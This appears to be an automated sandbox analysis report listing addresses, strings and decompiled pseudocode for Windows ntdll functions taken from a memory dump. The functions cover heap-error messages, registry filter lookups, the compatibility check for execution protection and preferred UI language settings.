0x6abd1859
0x6abd1859
0x6abd185c
0x00000000
0x00000000
0x6abd1851
0x6abd1853
0x6abd1855
0x6abd1865
0x6abd1865
0x6abd1866
0x6abd1868
0x6abd1870
0x00000000
0x6abd1870
0x6abd1857
0x6abd1857
0x6abd185e
0x00000000
0x6abd16d2
0x6abd16d2
0x6abd16d5
0x6abd16d5
0x6abd16d8
0x6abd16da
0x6abd16dd
0x6abd16e0
0x6abd16e3
0x6abd16e5
0x6abd1808
0x6abd1808
0x6abd1809
0x6abd1812
0x6abd1817
0x6abd1817
0x00000000
0x6abd1817
0x6abd16eb
0x6abd16ed
0x00000000
0x00000000
0x6abd16f6
0x6abd16f9
0x6abd16ff
0x6abd1701
0x6abd172c
0x6abd172c
0x6abd172f
0x6abd1732
0x6abd1734
0x6abd1737
0x6abd173b
0x6abd175e
0x6abd175e
0x6abd1761
0x6abd1764
0x6abd176d
0x6abd1774
0x6abd1777
0x6abd177a
0x6abd177c
0x6abd177f
0x6abd1781
0x6abd1781
0x6abd1784
0x6abd1784
0x6abd177f
0x6abd178c
0x6abd1791
0x6abd1796
0x6abd1799
0x6abd179c
0x6abd179e
0x6abd17a5
0x6abd17a9
0x6abd17c9
0x6abd17ce
0x6abd17ab
0x6abd17c1
0x6abd17c6
0x6abd17dc
0x6abd17e3
0x6abd17e8
0x6abd17ee
0x6abd17f1
0x6abd17f5
0x6abd17f7
0x6abd17fe
0x6abd17ff
0x6abd17ff
0x6abd17f5
0x6abd179c
0x00000000
0x6abd1764
0x6abd1741
0x6abd1746
0x6abd1748
0x00000000
0x00000000
0x6abd1754
0x00000000
0x6abd1754
0x6abd1703
0x6abd1710
0x6abd1710
0x6abd1713
0x00000000
0x00000000
0x6abd1708
0x6abd170a
0x6abd170c
0x6abd171c
0x6abd171c
0x6abd171d
0x6abd171f
0x6abd1727
0x00000000
0x6abd1727
0x6abd170e
0x6abd170e
0x6abd1715
0x00000000
0x6abd1715
0x6abd16cc
0x6ab89a45
0x6ab89a45
0x6ab89a0e
0x6ab89a1c
0x6ab89a23
0x6abd167e
0x6abd167f
0x6abd1681
0x6abd1683
0x6abd1684
0x00000000
0x6abd1684
0x00000000
0x6ab89aad
0x6ab89aad
0x6ab89ab0
0x6ab89ab3
0x6ab89ab3
0x6ab89ab6
0x00000000
0x00000000
0x6ab89ab8
0x6ab89aba
0x6ab89abc
0x6ab89ac8
0x6ab89ac8
0x00000000
0x6ab89abe
0x6ab89abe
0x6ab89ac0
0x00000000
0x6ab89ac0
0x6ab89abc
0x6ab89ad2
0x00000000
0x6ab89ad2
0x6ab89aab

Strings

HEAP[%wZ]: , xrefs: 6ABD1550, 6ABD1617, 6ABD17BC, 6ABD1905
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 6ABD1572, 6ABD1639, 6ABD17DE, 6ABD1927
HEAP: , xrefs: 6ABD155D, 6ABD1624, 6ABD17C9, 6ABD1912

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: f143f9a7af082eab425f91d16154a2f0a373e27db91af273a09e89a2d096b4cd
Instruction ID: 29fcf5569b9c05b4cff34db36bd4da3dc4592668652ac589729ea1ee05b0c2b5
Opcode Fuzzy Hash: f143f9a7af082eab425f91d16154a2f0a373e27db91af273a09e89a2d096b4cd
Instruction Fuzzy Hash: EC2234B0A002C19FDB14DF28D494B7ABBF5EF45308F198569E4558B392EF35E881EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB68239, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 233
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6AB68239(signed int* __ecx, long* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				long _v568;
				long _v572;
				intOrPtr _v576;
				short _v578;
				void* _v580;
				signed int _v584;
				intOrPtr _v586;
				void* _v588;
				void* _v592;
				void* _v596;
				intOrPtr _v600;
				long* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				void* _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				void* _t99;
				long _t118;
				intOrPtr _t125;
				short _t126;
				signed int* _t137;
				void* _t138;
				intOrPtr _t143;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t150;
				signed int _t151;
				void* _t152;
				signed int _t154;

				_t149 = __edx;
				_v12 =  *0x6ac5d360 ^ _t154;
				_v564 = _v564 & 0x00000000;
				_t151 = _a4;
				_t137 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t150 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E6AB76D30( &_v580, L"UseFilter") < 0) {
					L4:
					return E6ABAB640(_t89, _t137, _v12 ^ _t154, _t149, _t150, _t151);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_push(2);
				_push( &_v580);
				_push( *_t137);
				_t89 = E6ABA9650();
				if(_t89 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t89 = 0;
					} else {
						_t94 =  *_t151;
						_t151 =  *(_t151 + 4);
						_v588 = _t94;
						_v584 = _t151;
						if(E6AB76D30( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(RtlPrefixUnicodeString( &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t151 + 8;
						}
						_t99 =  &_v560;
						_t143 = 0;
						_v596 = _t99;
						_v600 = 0;
						do {
							_t149 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t99);
							_push(0);
							_push(_t143);
							_push( *_t137);
							_t151 = E6ABA9820();
							if(_t151 < 0) {
								goto L37;
							}
							_t145 = _v596;
							_v580 =  *((intOrPtr*)(_t145 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t145 + 0xc));
							_v576 = _t145 + 0x10;
							_v636 =  *_t137;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t151 = E6ABA9600();
							if(_t151 < 0) {
								goto L37;
							}
							_t151 = E6AB76D30( &_v580, L"FilterFullPath");
							if(_t151 < 0) {
								L36:
								_push(_v564);
								E6ABA95D0();
								goto L37;
							}
							_t138 = _v592;
							_t118 = _v568;
							do {
								_push( &_v572);
								_push(_t118);
								_push(_t138);
								_push(2);
								_push( &_v580);
								_push(_v564);
								_t152 = E6ABA9650();
								if(_t152 == 0x80000005 || _t152 == 0xc0000023) {
									if(_t150 != 0) {
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t150);
									}
									_t147 =  *( *[fs:0x30] + 0x18);
									if(_t147 != 0) {
										_t150 = RtlAllocateHeap(_t147,  *0x6ac57b9c + 0x180000, _v572);
										if(_t150 == 0) {
											goto L25;
										}
										_t118 = _v572;
										_t138 = _t150;
										_v596 = _t150;
										_v568 = _t118;
										goto L27;
									} else {
										_t150 = 0;
										L25:
										_t151 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t118 = _v568;
								}
								L27:
							} while (_t151 == 0x80000005 || _t151 == 0xc0000023);
							_v592 = _t138;
							_t137 = _v608;
							if(_t151 >= 0) {
								_t148 = _v592;
								if( *((intOrPtr*)(_t148 + 4)) != 1) {
									goto L36;
								}
								_t125 =  *((intOrPtr*)(_t148 + 8));
								if(_t125 > 0xfffe) {
									goto L36;
								}
								_t126 = _t125 + 0xfffffffe;
								_v616 = _t126;
								_v614 = _t126;
								_v612 = _t148 + 0xc;
								if(RtlCompareUnicodeString( &_v588,  &_v616, 1) == 0) {
									break;
								}
								goto L36;
							}
							_push(_v564);
							E6ABA95D0();
							_t65 = _t151 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t151 = _t151 &  ~_t65;
							L37:
							_t99 = _v596;
							_t143 = _v600 + 1;
							_v600 = _t143;
						} while (_t151 >= 0);
						if(_t150 != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t150);
						}
						if(_t151 >= 0) {
							_push( *_t137);
							E6ABA95D0();
							 *_t137 = _v564;
						}
						_t85 = _t151 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t89 =  ~_t85 & _t151;
					}
					goto L4;
				}
				if(_t89 != 0xc0000034) {
					if(_t89 == 0xc0000023) {
						goto L3;
					}
					if(_t89 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

0x6ab68239
0x6ab6824b
0x6ab6824e
0x6ab6825d
0x6ab68260
0x6ab6826e
0x6ab68275
0x6ab6827b
0x6ab6827d
0x6ab68287
0x6ab68294
0x6ab682ce
0x6ab682de
0x6ab682de
0x6ab6829c
0x6ab6829d
0x6ab682a8
0x6ab682a9
0x6ab682b1
0x6ab682b2
0x6ab682b4
0x6ab682bb
0x6abc2dfa
0x6ab682cc
0x6ab682cc
0x6abc2e19
0x6abc2e19
0x6abc2e1b
0x6abc2e1e
0x6abc2e30
0x6abc2e3d
0x00000000
0x00000000
0x6abc2e5a
0x6abc2e61
0x6abc2e68
0x6abc2e72
0x6abc2e72
0x6abc2e78
0x6abc2e7e
0x6abc2e80
0x6abc2e86
0x6abc2e8c
0x6abc2e8c
0x6abc2e92
0x6abc2e93
0x6abc2e99
0x6abc2e9a
0x6abc2e9c
0x6abc2e9d
0x6abc2ea4
0x6abc2ea8
0x00000000
0x00000000
0x6abc2eae
0x6abc2eb8
0x6abc2ec3
0x6abc2eca
0x6abc2ed1
0x6abc2edb
0x6abc2ee3
0x6abc2eef
0x6abc2efb
0x6abc2efc
0x6abc2f08
0x6abc2f12
0x6abc2f13
0x6abc2f22
0x6abc2f26
0x00000000
0x00000000
0x6abc2f3d
0x6abc2f41
0x6abc3069
0x6abc3069
0x6abc306f
0x00000000
0x6abc306f
0x6abc2f47
0x6abc2f4d
0x6abc2f53
0x6abc2f59
0x6abc2f5a
0x6abc2f5b
0x6abc2f5c
0x6abc2f64
0x6abc2f65
0x6abc2f70
0x6abc2f78
0x6abc2f84
0x6abc2f92
0x6abc2f92
0x6abc2f9d
0x6abc2fa2
0x6abc3004
0x6abc3008
0x00000000
0x00000000
0x6abc300a
0x6abc3010
0x6abc3012
0x6abc3018
0x00000000
0x6abc2fa4
0x6abc2fa4
0x6abc2fa6
0x6abc2fa6
0x00000000
0x6abc2fa6
0x6abc2fab
0x6abc2fab
0x6abc2fab
0x6abc2fab
0x6abc2fb1
0x6abc2fb1
0x6abc2fc1
0x6abc2fc7
0x6abc2fcf
0x6abc3020
0x6abc302a
0x00000000
0x00000000
0x6abc302c
0x6abc3034
0x00000000
0x00000000
0x6abc3036
0x6abc3039
0x6abc3040
0x6abc304a
0x6abc3067
0x00000000
0x00000000
0x00000000
0x6abc3067
0x6abc2fd1
0x6abc2fd7
0x6abc2fdc
0x6abc2fe4
0x6abc2fe6
0x6abc3074
0x6abc307a
0x6abc3080
0x6abc3081
0x6abc3087
0x6abc3091
0x6abc309f
0x6abc309f
0x6abc30a6
0x6abc30a8
0x6abc30aa
0x6abc30b5
0x6abc30b5
0x6abc30b7
0x6abc30bf
0x6abc30c1
0x6abc30c1
0x00000000
0x6abc2dfa
0x6ab682c6
0x6abc2ddd
0x00000000
0x00000000
0x6abc2de8
0x00000000
0x00000000
0x6abc2dee
0x00000000

APIs

RtlInitUnicodeStringEx.1105(?,UseFilter,?,00000000,?), ref: 6AB6828D
ZwQueryValueKey.1105(?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6AB682B4
RtlInitUnicodeStringEx.1105(?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6ABC2E36
RtlPrefixUnicodeString.1105(?,?,00000001,?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6ABC2E53
ZwEnumerateKey.1105(?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?,00000002,?,00000220), ref: 6ABC2E9F
ZwOpenKey.1105(00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?), ref: 6ABC2F1D
RtlInitUnicodeStringEx.1105(?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\), ref: 6ABC2F38
ZwQueryValueKey.1105(00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220), ref: 6ABC2F6B
RtlFreeHeap.1105(?,00000000,00000000,00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000), ref: 6ABC2F92

Strings

UseFilter, xrefs: 6AB68263
FilterFullPath, xrefs: 6ABC2F2C
\??\, xrefs: 6ABC2E2A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: StringUnicode$Init$QueryValue$EnumerateFreeHeapOpenPrefix
String ID: FilterFullPath$UseFilter$\??\
API String ID: 941260810-2779062949
Opcode ID: 63a4d6455fe511089ea6a30c1643a1891d8cfb36ddac864d6842492811939df8
Instruction ID: 3e12f777dd4db2be011e93a6ee29d4d72964d8371629d1d1fe03fc3097111a3a
Opcode Fuzzy Hash: 63a4d6455fe511089ea6a30c1643a1891d8cfb36ddac864d6842492811939df8
Instruction Fuzzy Hash: 9AA18D32D016A99BDB21DF68CC88B9DF3B8EF05704F0101E9E909A7250EB359E84EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6AB640FD, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E6AB640FD(void* __ecx) {
				signed int _v8;
				long _v548;
				signed int _v552;
				char _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t53;
				unsigned int _t66;
				void* _t68;
				wchar_t* _t73;
				intOrPtr _t77;
				short* _t85;
				wchar_t* _t98;
				signed int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x6ac5d360 ^ _t107;
				_v8 =  *0x6ac5d360 ^ _t107;
				_t105 = __ecx;
				if( *0x6ac584d4 == 0) {
					L5:
					return E6ABAB640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E6AB7E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					if(E6AB642EB(_t105) != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E6AB641EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
						}
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E6ABA96C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					if(E6AB6429E(_t105 + 0x2c, _t102) >= 0) {
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E6ABF5720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						memset( &_v548, 0, 0x214);
						_t106 =  *0x6ac584d4;
						_t110 = _t108 + 0x20;
						 *0x6ac5b1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						if( *( *0x6ac584d4)() == 0) {
							goto L8;
						}
						_t66 = _v560;
						if(_t66 == 0 || _t66 >= 0x214) {
							goto L8;
						} else {
							_t68 = (_t66 >> 1) * 2 - 2;
							if(_t68 >= 0x214) {
								E6ABAB75A();
								goto L33;
							}
							_push(_t85);
							 *((short*)(_t107 + _t68 - 0x220)) = 0;
							E6ABF5720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
							_t111 = _t110 + 0x14;
							_t73 = wcsstr( &_v548, L"Execute=1");
							_push(_t85);
							if(_t73 == 0) {
								E6ABF5720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
								_t106 =  &_v548;
								_t98 = _t106;
								_t112 = _t111 + 0x14;
								_t77 = _t98 + _v560;
								_v556 = _t77;
								if(_t98 >= _t77) {
									goto L8;
								} else {
									goto L27;
								}
								do {
									L27:
									_t85 = wcschr(_t106, 0x20);
									if(_t85 != 0) {
										 *_t85 = 0;
									}
									E6ABF5720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
									_t112 = _t112 + 0x10;
									E6ABE3E13(_t105, _t106);
									if(_t85 == 0) {
										goto L8;
									}
									_t41 = _t85 + 2; // 0x2
									_t106 = _t41;
								} while (_t106 < _v556);
								goto L8;
							}
							_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
							_push(3);
							_push(0x55);
							E6ABF5720();
							goto L15;
						}
					}
					L8:
					if(E6AB641F7(_t105) != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x6ab6410d
0x6ab6410f
0x6ab6411c
0x6ab6411e
0x6ab64158
0x6ab64168
0x6ab64168
0x6ab64126
0x6ab64130
0x6ab6413c
0x6abc04a2
0x6ab64142
0x6ab6414b
0x6ab6414b
0x6ab6414f
0x6ab6416b
0x6ab64178
0x6ab641d0
0x6ab641d2
0x6ab641d3
0x6ab641a7
0x6ab641b0
0x6ab641db
0x6ab641b2
0x6ab641b8
0x6ab641bf
0x6ab641c1
0x6ab641c1
0x6ab641c5
0x6ab641df
0x6ab641e2
0x6ab641e2
0x6ab641c9
0x6abc0628
0x6abc0628
0x6abc0630
0x6abc0631
0x6abc0633
0x6abc0635
0x6abc0635
0x00000000
0x6ab641c9
0x6ab6417d
0x6ab64183
0x6ab64190
0x6abc04af
0x00000000
0x00000000
0x6abc04b5
0x6abc04c8
0x6abc04d5
0x6abc04e5
0x6abc04ea
0x6abc04f6
0x6abc0518
0x6abc0522
0x00000000
0x00000000
0x6abc0528
0x6abc0530
0x00000000
0x6abc0543
0x6abc0545
0x6abc054e
0x6abc0623
0x00000000
0x6abc0623
0x6abc0556
0x6abc0557
0x6abc056f
0x6abc0574
0x6abc0583
0x6abc058a
0x6abc058d
0x6abc05b5
0x6abc05c0
0x6abc05c6
0x6abc05c8
0x6abc05cb
0x6abc05cd
0x6abc05d5
0x00000000
0x00000000
0x00000000
0x00000000
0x6abc05db
0x6abc05db
0x6abc05e3
0x6abc05e9
0x6abc05ed
0x6abc05ed
0x6abc05fa
0x6abc05ff
0x6abc0606
0x6abc060d
0x00000000
0x00000000
0x6abc0613
0x6abc0613
0x6abc0616
0x00000000
0x6abc061e
0x6abc058f
0x6abc0594
0x6abc0596
0x6abc0598
0x00000000
0x6abc059d
0x6abc0530
0x6ab64196
0x6ab6419f
0x00000000
0x00000000
0x6ab641a1
0x00000000
0x6ab64151
0x6ab64151
0x6ab64151
0x00000000
0x6ab64151

APIs

RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?), ref: 6AB64130
ZwSetInformationProcess.1105(000000FF,00000022,?,00000004,00000003,?,00000000,00000000,?), ref: 6ABC0635

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 6ABC05AC
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 6ABC0566
CLIENT(ntdll): Processing section info %ws..., xrefs: 6ABC05F1
Execute=1, xrefs: 6ABC057D
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 6ABC04BF
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 6ABC058F
ExecuteOptions, xrefs: 6ABC050A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeaderImageInformationProcess
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 4034523672-484625025
Opcode ID: e4b291ee84add70c02796f8e88a1c0c84bc1a0ff1498366330e14ed8d61c3d9c
Instruction ID: 3eb89e1066240aafbd6c0ff344ff3a7d31d78a42469070c52417c3cbdbb9c2a8
Opcode Fuzzy Hash: e4b291ee84add70c02796f8e88a1c0c84bc1a0ff1498366330e14ed8d61c3d9c
Instruction Fuzzy Hash: E6617B3164169C7BEF10DA64DD98FAE3BB8EF15304F0111A5E615A7182EF309E45BF60

Uniqueness

Uniqueness Score: -1.00%

Function 6AC1CF70, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6AC1CF70(void* __ecx, intOrPtr _a4, intOrPtr _a8, unsigned int* _a12) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _t61;
				char _t92;
				unsigned int* _t94;
				void* _t104;
				char _t105;
				unsigned int _t107;
				intOrPtr _t109;

				_v44 = 7;
				_t92 = 0;
				_t96 = 0x2000000;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_t109 = L6AB6F108(0, __ecx, __ecx,  &_v40);
				if(_t109 >= 0) {
					if(_a4 != 1) {
						RtlInitUnicodeString( &_v36, L"Control Panel\\Desktop\\MuiCached");
						_v32 = _v48;
						_t104 = 0x18;
						_v28 =  &_v44;
						_push( &_v36);
						_push(0x20019);
						_v60 = 0;
						_push( &_v60);
						_v36 = _t104;
						_v24 = 0x40;
						_v20 = 0;
						_v16 = 0;
						_t109 = E6ABA9600();
						if(_t109 < 0) {
							L5:
							if(_t109 == 0x80000005) {
								goto L9;
							} else {
								_push(_v60);
								E6ABA95D0();
								_v64 = _t92;
								RtlInitUnicodeString( &_v48, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
								_v48 = _t104;
								_v44 = _t92;
								goto L7;
							}
						} else {
							RtlInitUnicodeString( &_v44, L"MachinePreferredUILanguages");
							_push(0x2000000);
							_t96 = _v68;
							_t109 = E6AB6F018(_t96,  &_v52,  &_v60, 0,  &_v64);
							if(_t109 >= 0) {
								goto L9;
							} else {
								goto L5;
							}
						}
					} else {
						RtlInitUnicodeString( &_v36, L"Control Panel\\Desktop");
						_v36 = 0x18;
						_v32 = _v48;
						L7:
						_v68 = _t92;
						_v36 =  &_v52;
						_push( &_v44);
						_push(0x20019);
						_v32 = 0x40;
						_push( &_v68);
						_v28 = _t92;
						_v24 = _t92;
						_t109 = E6ABA9600();
						if(_t109 >= 0) {
							RtlInitUnicodeString( &_v52, L"PreferredUILanguages");
							_push(_t96);
							_t96 = _v76;
							_t109 = E6AB6F018(_t96,  &_v60,  &_v68, _t92,  &_v72);
							L9:
							if(_t109 != 0xc0000034) {
								_t105 = _v56;
								if(_t105 != 0) {
									if(_t109 != 0x80000005) {
										_t109 = 0xc0000034;
									} else {
										_t107 = _t105 + 1 >> 1;
										if(_a8 != _t92) {
											_t94 = _a12;
											if( *_t94 >= _t107) {
												_push(_t96);
												_t109 = E6AB6F018(_v60,  &_v44,  &_v52, _a8,  &_v56);
												if(_t109 < 0) {
													goto L17;
												} else {
													if(_v56 == 7) {
														goto L16;
													} else {
														_t109 = 0xc0000034;
														goto L17;
													}
												}
												L29:
											} else {
												_t109 = 0xc0000023;
												L16:
												 *_t94 = _t107;
											}
											L17:
											_t92 = 0;
										} else {
											_t109 = _t92;
											 *_a12 = _t107;
										}
									}
								}
							}
						}
					}
				}
				_t61 = _v40;
				if(_t61 != 0) {
					if(_t61 != 0xffffffff) {
						 *0x6ab46cc4(_t61);
					}
					_v40 = _t92;
				}
				if(_v52 != 0) {
					_push(_v52);
					E6ABA95D0();
				}
				return _t109;
				goto L29;
			}

0x6ac1cf82
0x6ac1cf8c
0x6ac1cf91
0x6ac1cf96
0x6ac1cf9a
0x6ac1cf9e
0x6ac1cfa7
0x6ac1cfab
0x6ac1cfb9
0x6ac1cfe1
0x6ac1cfea
0x6ac1cff4
0x6ac1cff5
0x6ac1cffd
0x6ac1cffe
0x6ac1d007
0x6ac1d00b
0x6ac1d00c
0x6ac1d010
0x6ac1d018
0x6ac1d01c
0x6ac1d025
0x6ac1d029
0x6ac1d05d
0x6ac1d063
0x00000000
0x6ac1d069
0x6ac1d069
0x6ac1d06d
0x6ac1d07b
0x6ac1d080
0x6ac1d085
0x6ac1d089
0x00000000
0x6ac1d089
0x6ac1d02b
0x6ac1d035
0x6ac1d03a
0x6ac1d03b
0x6ac1d053
0x6ac1d057
0x00000000
0x00000000
0x00000000
0x00000000
0x6ac1d057
0x6ac1cfbb
0x6ac1cfc1
0x6ac1cfca
0x6ac1cfd2
0x6ac1d08d
0x6ac1d091
0x6ac1d095
0x6ac1d09d
0x6ac1d09e
0x6ac1d0a7
0x6ac1d0af
0x6ac1d0b0
0x6ac1d0b4
0x6ac1d0bd
0x6ac1d0c1
0x6ac1d0cd
0x6ac1d0d2
0x6ac1d0d3
0x6ac1d0eb
0x6ac1d0ed
0x6ac1d0f4
0x6ac1d0f6
0x6ac1d0fc
0x6ac1d104
0x6ac1d18d
0x6ac1d10a
0x6ac1d10b
0x6ac1d110
0x6ac1d11b
0x6ac1d120
0x6ac1d15e
0x6ac1d179
0x6ac1d17d
0x00000000
0x6ac1d17f
0x6ac1d184
0x00000000
0x6ac1d186
0x6ac1d186
0x00000000
0x6ac1d186
0x6ac1d184
0x00000000
0x6ac1d122
0x6ac1d122
0x6ac1d127
0x6ac1d127
0x6ac1d127
0x6ac1d129
0x6ac1d129
0x6ac1d112
0x6ac1d115
0x6ac1d117
0x6ac1d117
0x6ac1d110
0x6ac1d104
0x6ac1d0fc
0x6ac1d0f4
0x6ac1d0c1
0x6ac1cfb9
0x6ac1d12b
0x6ac1d131
0x6ac1d136
0x6ac1d139
0x6ac1d139
0x6ac1d13f
0x6ac1d13f
0x6ac1d148
0x6ac1d14a
0x6ac1d14e
0x6ac1d14e
0x6ac1d15b
0x00000000

APIs

RtlInitUnicodeString.1105(?,Control Panel\Desktop,?,?,?), ref: 6AC1CFC1
RtlInitUnicodeString.1105(?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1CFE1
ZwOpenKey.1105(?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1D020
RtlInitUnicodeString.1105(?,MachinePreferredUILanguages,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1D035
ZwClose.1105(?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1D06D
RtlInitUnicodeString.1105(?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1D080
ZwOpenKey.1105(00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,?,?,?), ref: 6AC1D0B8
RtlInitUnicodeString.1105(?,PreferredUILanguages,00000007,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached), ref: 6AC1D0CD
